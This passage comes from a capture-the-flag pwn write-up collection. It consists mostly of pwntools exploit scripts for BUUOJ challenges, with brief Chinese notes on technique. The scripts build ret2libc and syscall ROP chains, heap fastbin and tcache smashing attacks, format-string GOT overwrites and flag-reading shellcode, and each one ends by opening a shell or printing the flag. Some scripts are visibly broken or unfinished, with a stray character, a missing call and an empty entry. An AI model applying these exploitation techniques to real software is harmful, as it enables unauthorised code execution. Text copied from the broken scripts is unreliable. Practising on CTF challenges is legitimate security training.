	log.success('write_leak==>{}'.format(hex(write_leak)))
	return write_leak
def pwn(leak):
	libc=LibcSearcher('write',leak)
	libc_base=leak-libc.dump('write')
	system_addr=libc_base+libc.dump('system')
	binsh_addr=libc_base+libc.dump('str_bin_sh')
	payload ='a'*0x70
	payload+=p32(system_addr)
	payload+=p32(0)
	payload+=p32(binsh_addr)
	io.sendlineafter('!\n',payload)
	io.interactive()
if __name__=='__main__':
	leak=leak()
	pwn(leak)

52.[ZJCTF 2019]EasyHeap

#!/usr/bin/python
#coding:utf-8

from pwn import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',29095)
else:
	io=process('./easyheap')
elf=ELF('./easyheap')
system_addr=elf.plt['system']
free_got=elf.got['free']

def add(size,content='a'):
	io.sendlineafter('choice :','1')
	io.sendlineafter('Heap :',str(size))
	io.sendafter('heap:',content)

def edit(Index,size,content):
	io.sendlineafter('choice :','2')
	io.sendlineafter('Index :',str(Index))
	io.sendlineafter('Heap :',str(size))
	io.sendafter('heap :',content)
def dele(Index):
	io.sendlineafter('choice :','3')
	io.sendlineafter('Index :',str(Index))
	
def pwn():
	add(0x68)#0 heaparray[0]
	add(0x68)#1 heaparray[1]
	dele(1)
	edit(0,0x80,'a'*0x68+p64(0x71)+p64(0x6020ad))
	add(0x68,'/bin/sh\x00')#1
	#gdb.attach(io,'b free')
	#pause()
	add(0x68,'a'*0x23+p64(free_got))#2#0x6020ad
	edit(0,0x8,p64(system_addr))
	dele(1)
	io.interactive()
	
	
if __name__=='__main__':
	pwn()

53.axb_2019_brop64

#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',29892)
else:
	io=process('./axb_2019_brop64')
elf=ELF('./axb_2019_brop64')

puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main_addr=elf.sym['main']
pd_r=0x0000000000400963
ps_r15_r=0x0000000000400961
def leak():
	payload ='a'*0xd8
	payload+=p64(pd_r)
	payload+=p64(puts_got)
	payload+=p64(puts_plt)
	payload+=p64(main_addr)
	io.sendafter('me:\n',payload)
	io.recvuntil('\x61\x63\x09\x40')
	leak=u64(io.recv(6).ljust(8,'\x00'))
	
	log.success('puts_leak==>{}'.format(hex(leak)))
	return leak
def pwn(leak):
	libc=LibcSearcher('puts',leak)
	libc_base=leak-libc.dump('puts')
	system_addr=libc_base+libc.dump('system')
	binsh_addr=libc_base+libc.dump('str_bin_sh')
	log.success('libc_base==>{}'.format(hex(libc_base)))
	log.success('system_addr==>{}'.format(hex(system_addr)))
	log.success('binsh_addr==>{}'.format(hex(binsh_addr)))
	payload ='a'*0xd8
	payload+=p64(pd_r)
	payload+=p64(binsh_addr)
	payload+=p64(system_addr)
	io.sendlineafter('me:\n',payload)
	io.interactive()
if __name__=='__main__':
	leak=leak()
	pwn(leak)

54.cmcc_simplerop

#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',26251)
else:
	io=process('./simplerop')
int_80_r=0x0806eef0
pop_eax=0x080bae06
pop_edx=0x0806e82a
pop_ecx_ebx=0x0806e851
read_addr=0x806cd50
binsh_addr=0x080EB120

payload ='a'*32
payload+=p32(pop_eax)
payload+=p32(3)
payload+=p32(pop_ecx_ebx)
payload+=p32(binsh_addr)
payload+=p32(0)
payload+=p32(pop_edx)
payload+=p32(8)
payload+=p32(int_80_r)
payload+=p32(pop_eax)
payload+=p32(0xb)
payload+=p32(pop_ecx_ebx)
payload+=p32(0)
payload+=p32(binsh_addr)
payload+=p32(pop_edx)
payload+=p32(0)
payload+=p32(int_80_r)
#gdb.attach(io,'b *0x8048e6f')
#pause()
io.sendlineafter(':',payload)
sleep(0.1)
io.send('/bin/sh\x00')
io.interactive()

55.jarvisoj_level5

#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',26285)
else: 
	io=process('./level3_x64')

elf=ELF('./level3_x64')

write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.symbols['main']
rdi_ret=0x4006b3
rsi_r15_ret=0x4006b1
def leak():
	payload ='a'*0x88
	payload+=p64(rdi_ret)
	payload+=p64(1)
	payload+=p64(rsi_r15_ret)
	payload+=p64(write_got)
	payload+=p64(0)
	payload+=p64(write_plt)
	payload+=p64(main_addr)
	io.sendafter('Input:\n',payload)
	write_leak=u64(io.recv(6).ljust(8,'\x00'))
	log.success('write_leak==>{}'.format(hex(write_leak)))
	return write_leak
def pwn(write_leak):
	libc=LibcSearcher('write',write_leak)
	libc_base=write_leak-libc.dump('write')
	system_addr=libc.dump('system')+libc_base
	binsh_addr=libc.dump('str_bin_sh')+libc_base
	payload ='a'*0x88
	payload+=p64(rdi_ret)
	payload+=p64(binsh_addr)
	payload+=p64(system_addr)
	io.sendafter('Input:\n',payload)
	io.interactive()z
if __name__ =='__main__':
	write_leak=leak()
	pwn(write_leak)

56.[2020 新春红包题]3

  • 这题的远程环境是2.29。考点是对于2.29&2.30的关于smallbin和tcache结合时检查不严导致能够造成类似unsortbin attack类似的效果。称为tcahce smashing unlink attack。
  • 1.先在一个大小的tcachebin中填满6个chunk
  • 2.再在对应的smallbin里面加入两个chunk
  • 3.然后修改倒数第二个chunk的fd为倒数地一个chunk的首地址,bk为想要写入libc的地址-0 x10
  • 4.在通过calloc从smallbin中拿走倒数第一个chunk这样倒数第二个chunk就会被tcache_put 丢进对应的tcachebin然后fake_chunk的fd位置就被改成一个接近libc的地址
  • 5.程序开了sandbox,只能通过orw来读flag。那我们就通过触发后门函数,进行stack povit,不过由于程序开了pie ,而且我门泄漏了heap_base,这样就可以把rop申请进heap里面,然后计算rop的位置,进行stack povit
#!/usr/bin/python
#coding:utf-8

from pwn import *
context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',25725)
else:
	io=process('./pwn1')
libc=ELF('./../../libc/libc-2.29.so')
def add(index,much,content='a'):
	io.sendlineafter('input: ','1')
	io.sendlineafter('idx: ',str(index))
	io.sendlineafter('): ',str(much)) #(1.0x10 2.0xf0 3.0x300 4.0x400)
	io.sendlineafter('content: ',content)

def dele(index):
	io.sendlineafter('input: ','2')
	io.sendlineafter('idx: ',str(index))
	
def edit(index,content):
	io.sendlineafter('input: ','3')
	io.sendlineafter('idx: ',str(index))
	io.sendlineafter('content: ',content)

def show(index):	
	io.sendlineafter('input: ','4')
	io.sendlineafter('idx: ',str(index))

def backdoor(ct):
	io.sendlineafter('input: ','666')
	io.sendlineafter("say?",ct)
def leak():
	add(0,4)
	dele(0)
	add(1,4)
	dele(1)
	show(1)
	for i in range(2,7):
		add(i,4)
		dele(i)	
	for i in range(7,13):
		add(i,2)
		dele(i)
	show(1)
	heap_base=u64(io.recv(6).ljust(8,'\x00'))-0x1270
	log.success("heap_base==>"+hex(heap_base))
	return heap_base
def pwn(heap_base):
	add(13,4)
	add(14,1)
	dele(13)
	show(13)
	libc_base=u64(io.recv(6).ljust(8,'\x00'))-0x1e4ca0
	log.success("libc_base==>"+hex(libc_base))
	add(15,3)
	add(16,4)#第一个大小为0x100的smallbin进入
	add(0,4)
	dele(16)
	add(1,3)
	add(2,4)
	edit(16,"\x00"*0x308+p64(0x101)+p64(heap_base+0x37e0)+p64(heap_base+0xa60-0x10))
	add(3,2)
	
	fake_bp=heap_base+0x4540
	flag_addr=fake_bp+0x200
	pop_rdi=0x0000000000026542+libc_base
	pop_rsi=0x0000000000026f9e+libc_base
	pop_rdx=0x000000000012bda6+libc_base
	leave_ret=0x0000000000058373+libc_base
	open_addr=libc_base+libc.sym["open"]
	read_addr=libc_base+libc.sym["read"]
	write_addr=libc_base+libc.sym["write"]
	payload ="./flag".ljust(8,'\x00')
	payload+=p64(pop_rdi)
	payload+=p64(fake_bp)
	payload+=p64(pop_rsi)
	payload+=p64(0)
	payload+=p64(open_addr)
	payload+=p64(pop_rdi)
	payload+=p64(3)
	payload+=p64(pop_rsi)
	payload+=p64(flag_addr)
	payload+=p64(pop_rdx)
	payload+=p64(0x30)
	payload+=p64(read_addr)
	payload+=p64(pop_rdi)
	payload+=p64(1)
	payload+=p64(write_addr)
	add(5,4,payload)
	#gdb.attach(io)
	#pause()
	backdoor("a"*0x80+p64(fake_bp)+p64(leave_ret))
	io.interactive()
	

if __name__=='__main__':
	leak=leak()
	pwn(leak)

57.pwnable_orw

  • 做法1
#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='i386',os='linux',timeout=1)
context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',27221)
else:
	io=process('./orw')
open_shellcode='mov eax,0x5;push 0x00000067;push 0x616c662f;mov ebx,esp;xor ecx,ecx;xor edx,edx;int 0x80;'
read_shellcode='mov eax,0x3;mov ecx,ebx;mov ebx,0x3;mov edx,0x30;int 0x80;'
write_shellcode='mov eax,0x4;mov ebx,0x1;int 0x80;'
shellcode=asm(open_shellcode+read_shellcode+write_shellcode)
io.sendafter(':',shellcode)
print io.recv()
  • 做法2
#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='i386',os='linux',timeout=1)
context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',27221)
else:
	io=process('./orw')
elf=ELF('./orw')
open_shellcode=shellcraft.open('/flag')
read_shellcode=shellcraft.read(3,elf.bss(),0x30)
write_shellcode=shellcraft.write(1,elf.bss(),0x30)
shellcode=asm(open_shellcode+read_shellcode+write_shellcode)
io.sendafter(':',shellcode)
print io.recv()

58.axb_2019_fmt6

#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',25479)
else:
	io=process('./axb_2019_fmt64')
elf=ELF('./axb_2019_fmt64')
sprintf_got=elf.got['sprintf']
printf_got=elf.got['printf']
print hex(printf_got)
print hex(printf_got)
def leak():
	payload ='%9$s'.ljust(8)+p64(sprintf_got)
	#payload =p64(sprintf_got)+'%9$s'
	io.sendafter('me:',payload)
	leak=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
	log.success('sprintf_leak==>{}'.format(hex(leak)))
	return leak
def write(leak):
	libc=LibcSearcher('sprintf',leak)
	system_addr=leak-libc.dump('sprintf')+libc.dump('system')
	log.success('system_addr==>{}'.format(hex(system_addr)))
	di=system_addr&0xffff
	zhong=system_addr>>16&0xffff
	print hex(di)
	print hex(zhong)
	payload=('%'+str(di-0x9)+'c%12$hn'+'%'+str(zhong-di)+'c%13$hn').ljust(32,'a')+p64(printf_got)+p64(printf_got+2)
	io.sendlineafter('me:',payload)
	#gdb.attach(io,'b sprintf')
	io.sendline(';/bin/sh\x00')
	io.interactive()
	
if __name__=='__main__':
	leak=leak()

59.axb_2019_heap

60.xman_2018_main

  • 本地能通,远程的话由于输出的问题导致接受不到,无法leak所以不能通。
#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',25013)
else:
	io=process(['./Xman_2018_main'])
elf=ELF('./Xman_2018_main')

pop_rdi=0x0000000000400693
pop_rsi_r15=0x0000000000400691
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main_addr=elf.symbols['main']
leave_ret=0x000000000040060f
bss_addr=0x601060+0x100
bss2_addr=0x601060+0x100+0x30
def leak():
	payload ='a'*0x108
	payload+=p64(pop_rdi)
	payload+=p64(puts_got)
	payload+=p64(puts_plt)
	payload+=p64(main_addr)
	io.sendlineafter('bss:\n',payload)
	payload='a'*0xa
	payload+=p64(bss_addr)
	payload+=p64(leave_ret)
	io.sendlineafter('stack:\n',payload)
	puts_leak=u64(io.recv(6).ljust(8,'\x00'))
	log.success('puts_leak==>{}'.format(hex(puts_leak)))
	return puts_leak
def pwn(puts_leak):
	gdb.attach(io,'b *0x400610')
	pause()
	libc=LibcSearcher('puts',puts_leak)
	libc_base=puts_leak-libc.dump('puts')
	log.success('libc_base==>{}'.format(hex(libc_base)))
	system_addr=libc_base+libc.dump('system')
	binsh_addr=libc_base+libc.dump('binsh_addr')
	log.success('system_addr==>{}'.format(hex(system_addr)))
	log.success('binsh_addr==>{}'.format(hex(binsh_addr)))
	#payload ='a'*(0x108-32)+p64(leave_ret)+'a'*24
	#payload ='a'*0xe8+p64(pop_rdi)+'a'*8+p64(pop_rdi)+'a'*8
	payload ='a'*0x108
	payload+=p64(pop_rdi)
	payload+=p64(binsh_addr)
	payload+=p64(system_addr)
	payload+=p64(main_addr)
	io.sendlineafter('bss:\n',payload)
	payload='a'*0xa
	payload+=p64(bss_addr)
	payload+=p64(leave_ret)
	io.sendline(payload)
	io.interactive()
if __name__=='__main__':
	puts_leak=leak()
	pwn(puts_leak)

61.inny_rop

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'
if args.Q:
	io=remote('node3.buuoj.cn',26422)
else:
	io=process('./rop')
int_80=0x0806F430
pop_eax=0x080b8016
pop_ebx_edx=0x0806ecd9
pop_ecx=0x080de769
binsh_addr=0x080EB400

payload ='a'*0x10
payload+=p32(pop_eax)
payload+=p32(0x3)
payload+=p32(pop_ebx_edx)
payload+=p32(0)
payload+=p32(0x10)
payload+=p32(pop_ecx)
payload+=p32(binsh_addr)
payload+=p32(int_80)
payload+=p32(pop_eax)
payload+=p32(0xb)
payload+=p32(pop_ebx_edx)
payload+=p32(binsh_addr)
payload+=p32(0)
payload+=p32(pop_ecx)
payload+=p32(0)
payload+=p32(int_80)


io.sendline(payload)
sleep(0.1)
#gdb.attach(io)
#pause()
io.sendline('/bin/sh\x00')
io.interactive()

62.bjdctf_2020_babystack2

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',26789)
else:
	io=process('./bjdctf_2020_babystack2')
backdoor=0x400726
payload='a'*0x18
payload+=p64(backdoor)
io.sendlineafter('name:\n','-1')
io.sendlineafter('name?\n',payload)
io.interactive()